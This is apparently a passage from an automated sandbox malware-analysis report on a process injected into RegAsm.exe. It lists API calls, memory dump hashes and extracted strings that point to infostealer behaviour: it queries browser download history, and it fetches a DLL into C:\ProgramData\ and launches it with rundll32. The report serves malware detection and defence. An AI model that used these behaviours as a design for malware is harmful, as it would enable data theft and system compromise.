                                              • Opcode Fuzzy Hash: ef9bc361ae3474b21639a132a58aba64f028cb6e51941eb5dbb3e3cd302f48cd
                                              • Instruction Fuzzy Hash: AD5180B6608200AFDB41EB68FC45EEA7BE2EF85320F1945A8F158872B5E231DD519B41
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00417561
                                              • lstrcat.KERNEL32(?,?), ref: 004175B7
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                              • lstrcat.KERNEL32(?,00000000), ref: 004175DD
                                              • lstrcat.KERNEL32(?,?), ref: 004175FD
                                              • lstrcat.KERNEL32(?,?), ref: 00417611
                                              • lstrcat.KERNEL32(?), ref: 00417624
                                              • lstrcat.KERNEL32(?,?), ref: 00417638
                                              • lstrcat.KERNEL32(?), ref: 0041764B
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
                                                • Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00417295: _EH_prolog.MSVCRT ref: 0041729A
                                                • Part of subcall function 00417295: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 004172B2
                                                • Part of subcall function 00417295: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 004172B9
                                                • Part of subcall function 00417295: wsprintfA.USER32 ref: 004172D1
                                                • Part of subcall function 00417295: FindFirstFileA.KERNEL32(?,?), ref: 004172E8
                                                • Part of subcall function 00417295: StrCmpCA.SHLWAPI(?,004279AC), ref: 00417305
                                                • Part of subcall function 00417295: StrCmpCA.SHLWAPI(?,004279B0), ref: 0041731F
                                                • Part of subcall function 00417295: wsprintfA.USER32 ref: 00417343
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                              • String ID:
                                              • API String ID: 2058169020-0
                                              • Opcode ID: cd6bacedc1c3f9e2ca678f00183ebfccc2edba9b423ac6a884286efef3b30afc
                                              • Instruction ID: 9416cb0eeec3f2734b8d70144bef72cc8765a0d5c73c38ad71a129afe7317496
                                              • Opcode Fuzzy Hash: cd6bacedc1c3f9e2ca678f00183ebfccc2edba9b423ac6a884286efef3b30afc
                                              • Instruction Fuzzy Hash: 0041BBB6901119AACB11EBB1EC49EDE77BCAB09314F0045A6F605E3152EA38D7C88F64
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25a265d1254bd6bd74b5c8ada244088b9beb4dac5d55d0f9f3bf7583aeefbdbe
                                              • Instruction ID: 17daa2cb372d90f17861a6005800fbb0cc31d8704d42ef19f8c21e06dea2b38d
                                              • Opcode Fuzzy Hash: 25a265d1254bd6bd74b5c8ada244088b9beb4dac5d55d0f9f3bf7583aeefbdbe
                                              • Instruction Fuzzy Hash: 6E11CBF9905300BFDE049B15EC42EAB77B9EFA5700F840558F849CB220E736E919D6A7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                              • Instruction ID: 21dd88cd5308e306890444f7ddf1049af0295f33d9c7c9fbe8389be5c3b36deb
                                              • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                              • Instruction Fuzzy Hash: 17B1BDB5A04302AFCB04CF29DC81AAAB7E5FF98254F44452DF948D3711E739F9248BA5
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00408027
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • lstrlenA.KERNEL32(00000000), ref: 004082F3
                                              • lstrlenA.KERNEL32(00000000), ref: 00408307
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                              • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                              • API String ID: 3193997572-2241552939
                                              • Opcode ID: 20d0ab3ffbdea04d307fbd2ed09569c13fc689aeae1bf93c7325943a022d8e4a
                                              • Instruction ID: d29831c9e37ed535599b007c4b85b3d4954a6b9aee878767d3a134e4e1f994ac
                                              • Opcode Fuzzy Hash: 20d0ab3ffbdea04d307fbd2ed09569c13fc689aeae1bf93c7325943a022d8e4a
                                              • Instruction Fuzzy Hash: DFB18231804148EEDB09EBE5D956BEDBBB4AF18308F10415EE056731C2DFB82B88DB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004146CA
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                              • ShellExecuteEx.SHELL32(?), ref: 00414999
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$Internetlstrcpy$CloseHandle$FileOpenlstrcat$CreateExecuteReadShellSystemTimelstrlen
                                              • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                              • API String ID: 1286380332-2108736111
                                              • Opcode ID: 385c06684d207b492ba9f0715200da31d8292b8e03caad48a7cc927bc6b5d0fb
                                              • Instruction ID: 0ff6851dedcb9237b82c82971b9f0ba35dfa2521f43906a968e4506caad7270a
                                              • Opcode Fuzzy Hash: 385c06684d207b492ba9f0715200da31d8292b8e03caad48a7cc927bc6b5d0fb
                                              • Instruction Fuzzy Hash: 81B15F31C0529CEADB15EBE5C955BDEBBB8AF18308F10815EE41173186DBB82788CF65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                              • API String ID: 0-2679805236
                                              • Opcode ID: c6e46639e33bcc40dec45a827afd46387617dbb6678876e1a77bf13378ab62c5
                                              • Instruction ID: a75c44f1053ca422ad850f67f24c4cfff801e4108567648b68097d877a692a59
                                              • Opcode Fuzzy Hash: c6e46639e33bcc40dec45a827afd46387617dbb6678876e1a77bf13378ab62c5
                                              • Instruction Fuzzy Hash: 0E7114B19043468FDB04DF28EC94ADAB7E4FF94254F080529EC89D7201EB71E949CFA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                              • API String ID: 0-3864549341
                                              • Opcode ID: 0560e8a75008a7ec12d2d063011affa0780819289fc441fe6ed1cfdd60359442
                                              • Instruction ID: 59c14525269d8d62895bb918ef8438c6e9e386f8407dedb9eabaf518fa251cb9
                                              • Opcode Fuzzy Hash: 0560e8a75008a7ec12d2d063011affa0780819289fc441fe6ed1cfdd60359442
                                              • Instruction Fuzzy Hash: AA6158B5A40B026BE701AE20FC46BDF77A4AF41725F040128F9195F2C2E7A5F254C7E5
                                              Strings
                                              • cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1B6B0B3B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
                                              • API String ID: 0-2869280805
                                              • Opcode ID: 0086d0d4ab93c1203d4e16563f902d86d87064c9344081292a128b00c6de6c3d
                                              • Instruction ID: 8c0db5157a05b4874ab8e51f20ef9746fdd1f3366f005cb5de9744fd89d25930
                                              • Opcode Fuzzy Hash: 0086d0d4ab93c1203d4e16563f902d86d87064c9344081292a128b00c6de6c3d
                                              • Instruction Fuzzy Hash: 1741C3BAB013019FDB009F58EC809D6F7B5FF98225B00497EF64487621E772E854C7A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                              • API String ID: 0-131617836
                                              • Opcode ID: d037a6a41e5ca786a9bb7cc4d31a21638930680c310e8517830a65ce8cbe83f6
                                              • Instruction ID: dcf6958f356f53ae374440d1716c370d1e77f82c68cf04aec80f883d4e025e1f
                                              • Opcode Fuzzy Hash: d037a6a41e5ca786a9bb7cc4d31a21638930680c310e8517830a65ce8cbe83f6
                                              • Instruction Fuzzy Hash: BF5108B5E042828BDB009F34D8807E6F7B1BF62724F8441A8E88A5B245D772ED86D751
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: main$rbu_memory
                                              • API String ID: 0-3973752345
                                              • Opcode ID: e23b75604a2b221e22774f4d30b7cd782a9ef4565225ed452418fcbcf4fc8f91
                                              • Instruction ID: 560932ccc77b050c2f2c6eeb7327f97aa1904ceb8aaef29575d6067b5fd2a287
                                              • Opcode Fuzzy Hash: e23b75604a2b221e22774f4d30b7cd782a9ef4565225ed452418fcbcf4fc8f91
                                              • Instruction Fuzzy Hash: 5C51BFF5A01302DFDF008F6AD894BDAB7E8BF66655F00402AE889D7640D735ED49CB61
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96e3dded6a28bc39b6814406190a5ee310b6423c0b6a4461935745fb77bc2f7d
                                              • Instruction ID: a63c50ed7f2e1f422e8da2804d77f9146ac2d2d3583a572753094fc005a06c8a
                                              • Opcode Fuzzy Hash: 96e3dded6a28bc39b6814406190a5ee310b6423c0b6a4461935745fb77bc2f7d
                                              • Instruction Fuzzy Hash: D15150F4480222DBDB889F35DC8DAEB37BCBF10A55F044126F84AD6151DB35E46CCA66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                              • API String ID: 0-3074873597
                                              • Opcode ID: 7dcfe8b55b83046fd17ea6c55f031ecf7605badc486d36a541ab454af4011e27
                                              • Instruction ID: 54cca493e616a613a7afeeb9cd332f4065a9e4fcbb61b13fba583dde8400db62
                                              • Opcode Fuzzy Hash: 7dcfe8b55b83046fd17ea6c55f031ecf7605badc486d36a541ab454af4011e27
                                              • Instruction Fuzzy Hash: 25414EB5A00700EAE7105B56FC86BDB77B4DB4132BF080529F592C29A3D769A5D883E1
                                              Strings
